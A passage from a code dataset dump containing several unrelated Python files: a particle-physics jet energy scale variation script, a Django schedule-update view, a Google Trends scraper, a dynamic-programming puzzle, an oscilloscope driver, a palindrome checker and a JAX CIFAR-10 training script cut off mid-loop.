JetCorrectorParameters, JetCorrectionUncertainty\n\nfrom math import *\n\n\n\n\nclass JES:\n\n def __init__(self, filename):\n self.jcp = JetCorrectorParameters(filename, \"\")\n self.jcu = JetCorrectionUncertainty(self.jcp)\n\n def uncertainty(self, pt, eta):\n self.jcu.setJetPt(pt)\n self.jcu.setJetEta(eta)\n return self.jcu.getUncertainty(True);\n \nclass MyEvent:\n def __init__(self):\n return;\n\nclass SystematicVariation:\n def __init__(self, isData):\n filejes = \"txt/Fall12_V7_MC_Uncertainty_AK5PFchs.txt\" \n if isData:\n filejes = \"txt/Fall12_V7_DATA_Uncertainty_AK5PFchs.txt\"\n self.jes = JES(filejes)\n\n def cloneEvent(self, event):\n cloneevent = MyEvent();\n cloneevent.J2Eta = event.J2Eta\n cloneevent.HEEJJcosthetastar = event.HEEJJcosthetastar\n cloneevent.HEEJJDeltaPhiZJ1 = event.HEEJJDeltaPhiZJ1\n cloneevent.ZJJEnergy = event.ZJJEnergy\n cloneevent.E1Mass = event.E1Mass\n cloneevent.VBFJ2Pt = event.VBFJ2Pt\n cloneevent.ZMMMass = event.ZMMMass\n cloneevent.VBFJ2NHFraction = event.VBFJ2NHFraction\n cloneevent.J1ChFraction = event.J1ChFraction\n cloneevent.HEEJJPhi = event.HEEJJPhi\n cloneevent.J2NHFraction = event.J2NHFraction\n cloneevent.E1Charge = event.E1Charge\n cloneevent.HEEJJDeltaPtZ = event.HEEJJDeltaPtZ\n cloneevent.HMMJJPt = event.HMMJJPt\n cloneevent.M1Mass = event.M1Mass\n cloneevent.HEEJJdetaVBF = event.HEEJJdetaVBF\n cloneevent.ZEEPhi = event.ZEEPhi\n cloneevent.VBFJ1NHFraction = event.VBFJ1NHFraction\n cloneevent.M2Phi = event.M2Phi\n cloneevent.M1Eta = event.M1Eta\n cloneevent.M2Charge = event.M2Charge\n cloneevent.E1Pt = event.E1Pt\n cloneevent.VBFJ2btag = 
event.VBFJ2btag\n cloneevent.VBFJ1EFraction = event.VBFJ1EFraction\n cloneevent.HEEJJdphiVBF = event.HEEJJdphiVBF\n cloneevent.J1Eta = event.J1Eta\n cloneevent.M2Energy = event.M2Energy\n cloneevent.J1Ntrk = event.J1Ntrk\n cloneevent.ZEEMass = event.ZEEMass\n cloneevent.E2Mass = event.E2Mass\n cloneevent.M2Mass = event.M2Mass\n cloneevent.J2btag = event.J2btag\n cloneevent.J1EFraction = event.J1EFraction\n cloneevent.ZMMCharge = event.ZMMCharge\n cloneevent.weight = event.weight\n cloneevent.njets = event.njets\n cloneevent.J2Ntrk = event.J2Ntrk\n cloneevent.J2Phi = event.J2Phi\n cloneevent.isVBFMatched = event.isVBFMatched\n cloneevent.VBFJ1Eta = event.VBFJ1Eta\n cloneevent.J2PFraction = event.J2PFraction\n cloneevent.ZMMPt = event.ZMMPt\n cloneevent.HMMJJDeltaPtZ = event.HMMJJDeltaPtZ\n cloneevent.ZMMEta = event.ZMMEta\n cloneevent.isDecayMatched = event.isDecayMatched\n cloneevent.ZJJEta = event.ZJJEta\n cloneevent.HMMJJClassifier = event.HMMJJClassifier\n cloneevent.ZJJPt = event.ZJJPt\n cloneevent.truezlepmass = event.truezlepmass\n cloneevent.VBFJ2Eta = event.VBFJ2Eta\n cloneevent.VBFJ2Ntrk = event.VBFJ2Ntrk\n cloneevent.HMMJJhelphi = event.HMMJJhelphi\n cloneevent.HEEJJhelcosthetaZl2 = event.HEEJJhelcosthetaZl2\n cloneevent.HEEJJhelcosthetaZl1 = event.HEEJJhelcosthetaZl1\n cloneevent.HMMJJdetaVBF = event.HMMJJdetaVBF\n cloneevent.VBFJ2Phi = event.VBFJ2Phi\n cloneevent.M1Charge = event.M1Charge\n cloneevent.HMMJJcosthetastar = event.HMMJJcosthetastar\n cloneevent.HMMJJMass = event.HMMJJMass\n cloneevent.iszee = event.iszee\n cloneevent.step = event.step\n cloneevent.E1Phi = event.E1Phi\n cloneevent.iszmumu = event.iszmumu\n cloneevent.VBFJ1Pt = event.VBFJ1Pt\n cloneevent.ZEEPt = event.ZEEPt\n cloneevent.VBFJ2ChFraction = event.VBFJ2ChFraction\n cloneevent.HEEJJEnergy = event.HEEJJEnergy\n cloneevent.J1Phi = event.J1Phi\n cloneevent.E2Charge = event.E2Charge\n cloneevent.HEEJJClassifier = event.HEEJJClassifier\n cloneevent.VBFJ2Energy = event.VBFJ2Energy\n cloneevent.J2Mass = event.J2Mass\n cloneevent.VBFJ1Energy = event.VBFJ1Energy\n cloneevent.J1Pt = event.J1Pt\n cloneevent.VBFJ2PFraction = event.VBFJ2PFraction\n cloneevent.HEEJJEta = event.HEEJJEta\n cloneevent.E2Energy = event.E2Energy\n cloneevent.E2Phi = event.E2Phi\n cloneevent.HEEJJphistarZl1 = event.HEEJJphistarZl1\n cloneevent.HEEJJphistarZl2 = event.HEEJJphistarZl2\n cloneevent.E2Pt = event.E2Pt\n cloneevent.HEEJJMass = event.HEEJJMass\n cloneevent.HEEJJmassVBF = event.HEEJJmassVBF\n cloneevent.VBFJ1Ntrk = event.VBFJ1Ntrk\n cloneevent.J2Pt = event.J2Pt\n cloneevent.HMMJJEta = event.HMMJJEta\n cloneevent.J2EFraction = event.J2EFraction\n cloneevent.ZMMPhi = event.ZMMPhi\n cloneevent.ZJJMass = event.ZJJMass\n cloneevent.VBFJ1PFraction = event.VBFJ1PFraction\n cloneevent.HMMJJmassVBF = event.HMMJJmassVBF\n cloneevent.ZMMEnergy = event.ZMMEnergy\n cloneevent.M2Eta = event.M2Eta\n cloneevent.VBFJ2EFraction = event.VBFJ2EFraction\n cloneevent.ZJJCharge = event.ZJJCharge\n cloneevent.HEEJJDeltaPhiZ = event.HEEJJDeltaPhiZ\n cloneevent.HEEJJDeltaPhiZJ2 = event.HEEJJDeltaPhiZJ2\n cloneevent.M1Phi = event.M1Phi\n cloneevent.J2ChFraction = event.J2ChFraction\n cloneevent.VBFJ2Mass = event.VBFJ2Mass\n cloneevent.VBFJ1btag = event.VBFJ1btag\n cloneevent.HMMJJdphiVBF = event.HMMJJdphiVBF\n cloneevent.J1Mass = event.J1Mass\n cloneevent.VBFJ1ChFraction = event.VBFJ1ChFraction\n cloneevent.ZEEEta = event.ZEEEta\n cloneevent.HEEJJPt = event.HEEJJPt\n cloneevent.HMMJJSumAbsEtaJ1J2 = event.HMMJJSumAbsEtaJ1J2\n cloneevent.HMMJJPhi = 
event.HMMJJPhi\n cloneevent.HEEJJSumAbsEtaJ1J2 = event.HEEJJSumAbsEtaJ1J2\n cloneevent.M1Energy = event.M1Energy\n cloneevent.J2Energy = event.J2Energy\n cloneevent.J1NHFraction = event.J1NHFraction\n cloneevent.J1Energy = event.J1Energy\n cloneevent.HMMJJEnergy = event.HMMJJEnergy\n cloneevent.nvertices = event.nvertices\n cloneevent.HMMJJDeltaPhiZ = event.HMMJJDeltaPhiZ\n cloneevent.M2Pt = event.M2Pt\n cloneevent.J1btag = event.J1btag\n cloneevent.HEEJJhelphiZl2 = event.HEEJJhelphiZl2\n cloneevent.E2Eta = event.E2Eta\n cloneevent.HEEJJhelphiZl1 = event.HEEJJhelphiZl1\n cloneevent.M1Pt = event.M1Pt\n cloneevent.ZEEEnergy = event.ZEEEnergy\n cloneevent.E1Energy = event.E1Energy\n cloneevent.J1PFraction = event.J1PFraction\n cloneevent.HMMJJDeltaPhiZJ2 = event.HMMJJDeltaPhiZJ2\n cloneevent.HMMJJDeltaPhiZJ1 = event.HMMJJDeltaPhiZJ1\n cloneevent.HMMJJphistarZl1 = event.HMMJJphistarZl1\n cloneevent.HMMJJphistarZl2 = event.HMMJJphistarZl2\n cloneevent.HMMJJhelphiZl2 = event.HMMJJhelphiZl2\n cloneevent.ZEECharge = event.ZEECharge\n cloneevent.HMMJJhelphiZl1 = event.HMMJJhelphiZl1\n cloneevent.VBFJ1Mass = event.VBFJ1Mass\n cloneevent.ZJJPhi = event.ZJJPhi\n cloneevent.VBFJ1Phi = event.VBFJ1Phi\n cloneevent.HEEJJhelphi = event.HEEJJhelphi\n cloneevent.HMMJJhelcosthetaZl2 = event.HMMJJhelcosthetaZl2\n cloneevent.HMMJJhelcosthetaZl1 = event.HMMJJhelcosthetaZl1\n #cloneevent.E1Et = event.E1Et\n\n return cloneevent \n\n\n def applyJES(self, event, up):\n cloneevent = self.cloneEvent(event)\n #for branch in event.GetListOfBranches():\n # print branch.GetName()\n #cloneevent.eval(branch.GetName()) = event.eval(branch.GetName())\n #sys.exit(1) \n #print event.ZJJMass\n uncj1 = self.jes.uncertainty(event.J1Pt, event.J1Eta) \n uncj2 = self.jes.uncertainty(event.J2Pt, event.J2Eta) \n uncvbfj1 = self.jes.uncertainty(event.VBFJ1Pt, event.VBFJ1Eta) \n uncvbfj2 = self.jes.uncertainty(event.VBFJ2Pt, event.VBFJ2Eta) \n j1 = [event.J1Pt*cos(event.J1Phi), \n event.J1Pt*sin(event.J1Phi), \n event.J1Pt/tan(2*atan(exp(-1*event.J1Eta))),\n sqrt(event.J1Pt*event.J1Pt*(1+1/(tan(2*atan(exp(-1*event.J1Eta)))*tan(2*atan(exp(-1*event.J1Eta))))))]\n\n j2 = [event.J2Pt*cos(event.J2Phi), \n event.J2Pt*sin(event.J2Phi),\n event.J2Pt/tan(2*atan(exp(-1*event.J2Eta))),\n sqrt(event.J2Pt*event.J2Pt*(1+1/(tan(2*atan(exp(-1*event.J2Eta)))*tan(2*atan(exp(-1*event.J2Eta))))))]\n\n vbfj1 = [event.VBFJ1Pt*cos(event.VBFJ1Phi),\n event.VBFJ1Pt*sin(event.VBFJ1Phi),\n event.VBFJ1Pt/tan(2*atan(exp(-1*event.VBFJ1Eta))),\n sqrt(event.VBFJ1Pt*event.VBFJ1Pt*(1+1/(tan(2*atan(exp(-1*event.VBFJ1Eta)))*tan(2*atan(exp(-1*event.VBFJ1Eta))))))] \n\n vbfj2 = [event.VBFJ2Pt*cos(event.VBFJ2Phi),\n event.VBFJ2Pt*sin(event.VBFJ2Phi),\n event.VBFJ2Pt/tan(2*atan(exp(-1*event.VBFJ2Eta))),\n sqrt(event.VBFJ2Pt*event.VBFJ2Pt*(1+1/(tan(2*atan(exp(-1*event.VBFJ2Eta)))*tan(2*atan(exp(-1*event.VBFJ2Eta))))))]\n\n if up: \n cloneevent.J1Pt = event.J1Pt+uncj1*event.J1Pt\n cloneevent.J2Pt = event.J2Pt+uncj2*event.J2Pt\n cloneevent.VBFJ1Pt = event.VBFJ1Pt+uncvbfj1*event.VBFJ1Pt\n cloneevent.VBFJ2Pt = event.VBFJ2Pt+uncvbfj2*event.VBFJ2Pt\n \n for i in range(4):\n j1[i] = j1[i]+uncj1*j1[i]\n j2[i] = j2[i]+uncj2*j2[i]\n vbfj1[i] = vbfj1[i]+uncvbfj1*vbfj1[i]\n vbfj2[i] = vbfj2[i]+uncvbfj2*vbfj2[i] \n\n else:\n cloneevent.J1Pt = event.J1Pt-uncj1*event.J1Pt\n cloneevent.J2Pt = event.J2Pt-uncj2*event.J2Pt\n cloneevent.VBFJ1Pt = event.VBFJ1Pt-uncvbfj1*event.VBFJ1Pt\n cloneevent.VBFJ2Pt = event.VBFJ2Pt-uncvbfj2*event.VBFJ2Pt \n\n for i in range(4):\n j1[i] = j1[i]-uncj1*j1[i]\n 
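# hedged editorial comment (not in the original systematics.py): scale every stored four-vector component down by the same per-jet JES uncertainty, mirroring the pT shift above\n 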
j2[i] = j2[i]-uncj2*j2[i]\n vbfj1[i] = vbfj1[i]-uncvbfj1*vbfj1[i]\n vbfj2[i] = vbfj2[i]-uncvbfj2*vbfj2[i]\n\n jsum = [j1[0]+j2[0], j1[1]+j2[1], j1[2]+j2[2], j1[3]+j2[3]]\n vbfjsum = [vbfj1[0]+vbfj2[0], vbfj1[1]+vbfj2[1], vbfj1[2]+vbfj2[2], vbfj1[3]+vbfj2[3]]\n modmass = sqrt(max(jsum[3]*jsum[3] - jsum[0]*jsum[0] - jsum[1]*jsum[1] - jsum[2]*jsum[2], 0.) )\n modmassvbf = sqrt(max(vbfjsum[3]*vbfjsum[3] - vbfjsum[0]*vbfjsum[0] - vbfjsum[1]*vbfjsum[1] - vbfjsum[2]*vbfjsum[2], 0.) )\n #print \"orig mass\", event.ZJJMass, \"modmass\", modmass\n cloneevent.ZJJMass = modmass\n cloneevent.VBFMass = modmassvbf\n\n #print event.ZMMMass\n\n return cloneevent\n\n\n#if __name__==\"__main__\":\n# sv=SystematicVariation(False) \n# print \"JES test (40, 0)\", sv.getJES(40., 0.)\n# print \"JES test (40, 1)\", sv.getJES(40., 1.)\n# print \"JES test (40, 2)\", sv.getJES(40., 2.)\n# print \"JES test (40, 3)\", sv.getJES(40., 3.)\n# print \"JES test (40, 4)\", sv.getJES(40., 4.)\n# print \"JES test (40, 4.7)\", sv.getJES(40., 4.7)\n# print \"JES test (40, 5)\", sv.getJES(40., 5.)\n \n \n","sub_path":"PyHLLJJHighMass/systematics.py","file_name":"systematics.py","file_ext":"py","file_size_in_byte":10451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"568930482","text":"from app1.models import *\nfrom app1.util.utils import *\n\ndef updateAdvance(request):\n '''\n get:\n http://127.0.0.1:8000/app1/updateAdvance?ano=007&starttime=8:30&endtime=11:30&week=星期一\n 调用参数:\n ano:预排课表编号\n starttime:课程开始时间\n endtime:课程结束时间\n week:星期\n post:\n http://127.0.0.1:8000/app1/updateAdvance\n '''\n try:\n if(request.method=='POST'):\n teadata=json.loads(request.body)\n data=teadata[\"data\"]\n for item in data:\n # aid=request.GET.get(\"ano\")\n # st=request.GET.get(\"starttime\")\n # en=request.GET.get(\"endtime\")\n # we=request.GET.get(\"week\")\n\n aid=item[\"ano\"]\n st=item[\"starttime\"]\n en=item[\"endtime\"]\n we=item[\"week\"]\n\n result=Advance.objects.filter(ano=aid).update(starttime=st,endtime=en,week=we)\n\n result=Advance.objects.all().values(\"starttime\",\"endtime\",\"week\",\"teacher__tno\",\"teacher__tname\",\"classroom__crno\",\"course__cno\",\"course__cname\")\n return showJsonresult(result)\n except Exception as e:\n response={}\n response['msg']=str(e)\n response['err_num']=1\n return showJsonerror(response)","sub_path":"day12/Django/app1/dateview/updateAdvance.py","file_name":"updateAdvance.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"549610357","text":"# -*- coding: utf-8 -*- \n\nimport pandas as pd\nfrom pytrends.request import TrendReq\nfrom datetime import date, datetime\nfrom datetime import timedelta\nfrom unidecode import unidecode\nimport sys\n\ndef print_usage():\n '''\n Função que printa a chamada correta em caso de o usuário passar o número errado\n de argumentos\n '''\n\n print ('Chamada Correta: python fetch_google_trends.py ')\n\ndef get_data_inicial(apresentacao):\n '''\n Caso a apresentação tenha sido feita em menos de 6 meses retorna a data da apre\n sentação, caso contrário, retorna a data de 6 meses atrás\n '''\n \n seis_meses_atras = date.today() - timedelta(days=180)\n if datetime.strptime(apresentacao,'%Y-%m-%d').date() > seis_meses_atras:\n return apresentacao\n else:\n return seis_meses_atras.strftime('%Y-%m-%d')\n\ndef formata_timeframe(passado_formatado):\n '''\n Formata o timeframe para o formato aceitável pelo pytrends\n 
'''\n\n return passado_formatado + ' ' + date.today().strftime('%Y-%m-%d')\n\ndef get_trends(termo, timeframe):\n '''\n Retorna os trends\n '''\n\n pytrend.build_payload(termo, cat=0, timeframe=timeframe, geo='BR', gprop='')\n \ndef get_popularidade(termo, timeframe):\n '''\n Retorna a popularidade de termos passados em um intervalo de tempo\n (timeframe)\n '''\n\n get_trends(termo, timeframe)\n\n return pytrend.interest_over_time()\n\ndef get_termos_relacionados(termo, timeframe):\n '''\n Retorna os termos relacionados a um termo passado\n em um período de tempo especificado\n '''\n\n get_trends(termo, timeframe)\n related_queries_dict = pytrend.related_queries()\n if (len(related_queries_dict) == 0):\n return pd.DataFrame()\n\n related_queries_df = pd.DataFrame.from_dict(related_queries_dict[termo[0]]['top'])[:3]\n\n return related_queries_df\n\ndef get_termos_mais_populares(nome_formal, apelido, timeframe):\n '''\n De acordo com os termos relacionados ao nome formal da proposição e a seu apelido\n retorna os 3 termos mais popularidades \n '''\n\n termos_relacionados_formal = get_termos_relacionados([nome_formal], timeframe)\n termos_relacionados_apelido = get_termos_relacionados([apelido], timeframe)\n termos_relacionados_total = termos_relacionados_formal.append(termos_relacionados_apelido)\n termos_relacionados_total = termos_relacionados_total.drop_duplicates(subset =\"query\")\n if (len(termos_relacionados_total) > 0):\n termos_relacionados_total = termos_relacionados_total.sort_values(by=['value'], ascending=False)[:3]['query']\n\n return termos_relacionados_total.values.tolist()\n\ndef calcula_maximos(pop_df, apelido, nome_formal):\n '''\n Calcula o máximo da pressão entre o apelido e o nome formal,\n entre os termos relacionados e a pressão geral\n '''\n\n termos = pop_df\n termos['max_pressao_principal'] = termos[[apelido,nome_formal]].max(axis=1)\n cols_termos_relacionados = termos.columns[~termos.columns.isin([apelido, nome_formal, 'date', 'max_pressao_principal', 'isPartial'])]\n termos['max_pressao_rel'] = termos[cols_termos_relacionados].max(axis=1) if (len(cols_termos_relacionados) > 0) else 0\n termos['maximo_geral'] = termos[['max_pressao_rel','max_pressao_principal']].max(axis=1)\n\n return termos\n\ndef agrupa_por_semana(pop_df):\n '''\n Agrupa por semana começando na segunda e calcula os máximos das colunas\n '''\n\n pop_df = pop_df.reset_index()\n pop_df = pop_df.groupby(['id_ext', pd.Grouper(key='date', freq='W-MON'), 'casa']).agg('max')\n pop_df = pop_df.reset_index()\n pop_df['date'] = pd.to_datetime(pop_df['date']) - pd.to_timedelta(7, unit = 'd')\n\n return pop_df\n\ndef write_csv_popularidade(df_path, export_path):\n '''\n Para cada linha do csv calcula e escreve um csv com a popularidade da proposição\n '''\n\n props_sem_popularidade = 0\n apelidos = pd.read_csv(df_path, encoding='utf-8')\n for index, row in apelidos.iterrows():\n timeframe = formata_timeframe(get_data_inicial(row['apresentacao']))\n apelido = row['apelido'].replace('(', '').replace(')', '')\n nome_formal = row['nome_formal']\n id_ext = str(row['id_ext'])\n casa = row['casa']\n\n print('Pesquisando a popularidade: ' + apelido)\n\n termos_relacionados = [nome_formal, apelido] + get_termos_mais_populares(nome_formal, apelido, timeframe)\n termos = [unidecode(termo_rel) for termo_rel in termos_relacionados]\n termos = set(termos)\n pop_df = get_popularidade(list(termos), timeframe)\n\n if (pop_df.empty):\n props_sem_popularidade += 1\n\n print ('O Google nao retornou nenhum dado sobre: ' + 
apelido)\n        else:\n            pop_df = calcula_maximos(pop_df, apelido, nome_formal)\n            pop_df['id_ext'] = id_ext\n            pop_df['casa'] = casa\n            pop_df = agrupa_por_semana(pop_df)\n            pop_df.to_csv(export_path + 'pop_' + id_ext + '.csv', encoding='utf8')\n    if (props_sem_popularidade > 0):\n        print('Não foi possível retornar a popularidade de ' + str(props_sem_popularidade) + '/' + str(len(apelidos)) + ' proposições.')\n\nif __name__ == \"__main__\":\n    # Argumentos que o programa deve receber:\n    # -1º: Path para o arquivo onde estão os apelidos, nomes formais e datas de apresentações\n    # -2º: Path para a pasta onde as tabelas de popularidades devem ser salvas\n\n    if len(sys.argv) != 3:\n        print_usage()\n        exit(1)\n\n    df_path = sys.argv[1]\n    export_path = sys.argv[2]\n\n    pytrend = TrendReq()\n\n\n    write_csv_popularidade(df_path, export_path)\n\n","sub_path":"fetch_google_trends.py","file_name":"fetch_google_trends.py","file_ext":"py","file_size_in_byte":5630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"192779440","text":"# https://programmers.co.kr/learn/courses/30/lessons/12971\r\n\"\"\"\r\ndp[i] = max(sticker[i]+dp[i-2],sticker[i]+dp[i-3],dp[i-1])\r\n(0,1,2) 중 하나는 반드시 고르니까 세가지 케이스 확인하기\r\n\"\"\"\r\n\r\ndef solution(sticker):\r\n    if len(sticker) <= 3: return max(sticker)\r\n    dp1 = [0] * len(sticker)\r\n    dp1[2] = sticker[2]\r\n    dp2 = [0] * len(sticker)\r\n    dp2[1] = dp2[2] = sticker[1]\r\n    dp3 = [0] * len(sticker)\r\n    dp3[0] = dp3[1] = dp3[2] = sticker[0]\r\n    dp3[2] += sticker[2]\r\n    for i in range(3,len(dp1)):\r\n        dp1[i] = max(sticker[i]+dp1[i-2], sticker[i]+dp1[i-3], dp1[i-1])\r\n        dp2[i] = max(sticker[i]+dp2[i-2], sticker[i]+dp2[i-3], dp2[i-1])\r\n        dp3[i] = max(sticker[i]+dp3[i-2], sticker[i]+dp3[i-3], dp3[i-1])\r\n    dp3[-1] = max(dp3[i-1],dp3[i-2],dp3[i-3])\r\n    print(dp1)\r\n    print(dp2)\r\n    print(dp3)\r\n    return max(dp1[-1],dp2[-1],dp3[-1])\r\n\r\n    \r\nprint(solution([14,6,5,11,3,9,2,10]))\r\n","sub_path":"Level 4/스티커 모으기(2).py","file_name":"스티커 모으기(2).py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"18084853","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 26 18:39:33 2019\n\n@author: nicon\n\"\"\"\n\nimport pyvisa\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Osciloscopio(object):\n\n    def __init__(self, instrument = 0): #Ver cual es 1 y 0 con el generador\n        self.rm = pyvisa.ResourceManager()\n        if len(self.rm.list_resources()) > 0:\n            self.inst = self.rm.open_resource(self.rm.list_resources()[instrument])\n        else:\n            self.inst = []\n            print('No se detectó ningún instrumento')\n        if self.inst != []:\n            try:\n                print('El IDN del instrumento es ', self.inst.query(\"*IDN?\"))\n            except:\n                print('El instrumento no respondió cuando se le preguntó el nombre.')\n    \n    def data_encdg_ascii(self):\n        self.inst.write('DATA:ENCDG ASCII')\n    \n    def data_encdg_bin(self):\n        self.inst.write('DATA:ENCDG RIBinary')\n\n    def get_data_ascii(self):\n        self.data_encdg_ascii()\n        read = self.inst.query_ascii_values('CURVe?')\n        \n        plt.plot(read)\n        plt.show()\n        \n        return read\n\n    def read_voltage(self):\n        \n        self.data_encdg_bin()\n        read = np.array(self.inst.query_binary_values('CURVe?', datatype = 'b', is_big_endian= True))\n        \n        ymult = self.inst.query_ascii_values('WFMPRE:YMULT?') #Vertical scale factor\n        yzero = self.inst.query_ascii_values('WFMPRE:YZERO?') #Offset Voltage\n        yoff = 
self.inst.query_ascii_values('WFMPRE:YOFF?') #Vertical Offset\n\n voltage = yzero + ymult*(read - yoff)\n \n # plt.plot(voltage)\n #plt.show()\n \n return voltage\n \n \n def read_time(self): \n xincr = self.inst.query_ascii_values('WFMPRE:XINCR?') #Horizontal sampling interval\n xzero = self.inst.query_ascii_values('WFMPRE:XZERO?')\n pt_off = self.inst.query_ascii_values('WFMPRE:PT_Off?')\n \n n = np.linspace(0,2500,2500)\n #Ver https://www.i3detroit.org/wi/images/2/2d/460-ProgrammerManual.pdf pag 2-43\n time = xzero + xincr*(n - pt_off)\n \n return time\n \n def grafico(self):\n voltage = self.read_voltage()\n time = self.read_time()\n \n vpp = 2*max(voltage)\n \n plt.plot(time, voltage)\n plt.xlabel('Time (s)')\n plt.ylabel('Voltage (V)')\n plt.show()\n \n return vpp\n\n \n def set_timebase(self, seconds):\n self.inst.write('HOR:DEL:SCA {}'.format(seconds))\n","sub_path":"Practica_1_Osciloscopio_Generador/Osciloscopio.py","file_name":"Osciloscopio.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"487517780","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nEste é um arquivo de script temporário.\n\n\n\n\"\"\"\n\ndef toChar(s):\n s = s.lower()\n ans = ''\n for c in s:\n if (c in 'abcdefghijklmnopqrstuvwxyz'):\n ans = ans + c\n return ans\n\n\ndef isPalindrome(frase):\n f = toChar(frase)\n \n if(len(f)<=1):\n return True\n else:\n return f[0]==f[-1] and isPalindrome(f[1:-1])\n\nprint(isPalindrome('Are we not drawn onward to new era?'))","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"429744485","text":"import argparse\n\nparser = argparse.ArgumentParser(description='Learn to classify a CIFAR-10')\nparser.add_argument('--step_size', dest='step_size', \n type=float, default=1e-2,\n help='Step size')\nparser.add_argument('--num_epochs', dest='num_epochs', \n type=int, default=100,\n help='Number of epochs')\nparser.add_argument('--batch_size', dest='batch_size', \n type=int, default=100,\n help='Mini-batch size')\nparser.add_argument('--tag', dest='tag', \n type=str, default=\"no_tag_{n_params}_params@\",\n help='Tag for logging with tensorboard')\nparser.add_argument('--layers', dest='layers_str', \n type=str, default=\"[Flatten, Dense(10),Softmax]\",\n help=\"Use ODE layer\")\nparser.add_argument('--log_dir', dest='log_dir', \n type=str, default=\"/tmp/checkpoints/\",\n help=\"Directory where to store tensorboard logs.\")\nparser.add_argument('--log_eps', dest='log_eps', \n type=float, default=1e-2,\n help='A constant to add the inputs of np.log to avoid log(0).')\nparser.add_argument('--l2_reg', dest='l2_reg', \n type=float, default=0.,\n help='Multiplies the l2 norm of the parameter vectors and added to the objective function.')\n\n\nargs = parser.parse_args()\nprint(args)\n\n\n# params\nstep_size = args.step_size\nnum_epochs = args.num_epochs\nbatch_size = args.batch_size\ntag = args.tag\nlayers_str = args.layers_str\nlog_dir = args.log_dir\nlog_eps = args.log_eps\nl2_reg = args.l2_reg\n\n# Imports\nimport datetime\nimport itertools\nimport jax\nimport jax.numpy as np\nimport keras\nimport matplotlib.pyplot as plt\nimport numpy as onp\nimport numpy.random as npr\nimport os\nimport pickle\nimport tarfile\nimport tensorboard_logging\nimport time\nimport zipfile \n\nfrom ode_stax import *\n\nfrom data_streamer import 
DataStreamer\nfrom jax import device_put\nfrom jax import grad\nfrom jax import jit\nfrom jax.config import config\nfrom jax.experimental import optimizers\nfrom jax.experimental import stax\nfrom jax.experimental.stax import BatchNorm\nfrom jax.experimental.stax import Conv\nfrom jax.experimental.stax import Dense\nfrom jax.experimental.stax import Dropout\nfrom jax.experimental.stax import Flatten\nfrom jax.experimental.stax import MaxPool\nfrom jax.experimental.stax import Relu\nfrom jax.experimental.stax import Softmax\nfrom jax.tree_util import tree_flatten\nfrom keras.datasets import cifar10\nfrom plot_help import *\n\n\n\n\n# init randomness\nkey = jax.random.PRNGKey(0)\nnpr.seed(0)\n\n\n# Download datasets\n# The data, split between train and test sets:\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\nx_train = (x_train / 250.).astype(np.float64)#.reshape(-1, 28, 28, 1)\nx_test = (x_test / 250.).astype(np.float64)#.reshape(-1, 28, 28, 1)\nnum_classes = 10\nprint('x_train shape:', x_train.shape)\nprint('y_train shape:', y_train.shape)\n\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\n\n\n# Build NN\n@jit\ndef vec(params):\n \"\"\"Stack parameters in a big vector.\"\"\"\n \n leaves, _ = tree_flatten(params)\n return np.hstack([x.flatten() for x in leaves])\n\n\ndef cross_entropy(a, b):\n return - np.sum(a * np.log(b+log_eps))\n\n\n@jit\ndef loss(params, batch):\n inputs, targets = batch\n preds = predict(params, inputs, rng=key)\n return cross_entropy(targets, preds) + l2_reg * np.linalg.norm(vec(params))\n\n\n@jit\ndef accuracy(params, batch):\n inputs, targets = batch\n target_class = np.argmax(targets, axis=1)\n predicted_class = np.argmax(predict(params, inputs, rng=key), axis=1)\n return np.mean(predicted_class == target_class)\n\n\nprint(\"Evaluating layers from string:\", layers_str)\nlayers = eval(layers_str)\ninit_random_params, predict = stax.serial(*layers)\n\n\n\n \n################\n# Optimizer\n################\n\n# start adam optimizer and initialize parameters\nopt_init, opt_update = optimizers.adam(step_size)\nout_shape, init_params = init_random_params((-1,) + x_train.shape[1:])\nopt_state = opt_init(init_params)\nn_params = len(vec(init_params))\n\n# helper function to perform a one step update of the parameters\n@jit\ndef update(i, opt_state, batch):\n params = optimizers.get_params(opt_state)\n return opt_update(i, grad(loss)(params, batch), opt_state)\n\n\nprint(\"Gettting batches\")\ndata_streamer = DataStreamer(x_train, y_train, batch_size=batch_size, num_classes=num_classes)\ndata_streamer_test = DataStreamer(x_test, y_test, batch_size=batch_size, num_classes=num_classes)\n\nitercount = itertools.count()\nprint(\"Starting logger\")\nlogger = tensorboard_logging.create_logger(tag=tag.format(n_params=n_params), log_dir=log_dir)\nprint(\"Number of params %.4fk\" % (n_params/1e3))\n\n# Start iterating\nprint(\"|\".join(map(lambda s: s.center(10, ' '), \"Epoch,Loss,Accuracy,dt\".split(\",\"))))\nfor epoch in range(num_epochs):\n start_time = time.time()\n\n # loss and accuracy for each minibatch\n cum_loss = []\n cum_acc = []\n\n # runs through all the data\n for _ in range(data_streamer.num_batches):\n batch = next(data_streamer.stream_iter)\n i = next(itercount)\n opt_state = update(i, opt_state, batch)\n params = optimizers.get_params(opt_state)\n \n # logger\n loss_i = loss(params, batch)\n # evaluate accuracy on test batch\n batch_test = next(data_streamer.stream_iter)\n acc_i = accuracy(params, batch_test)\n 
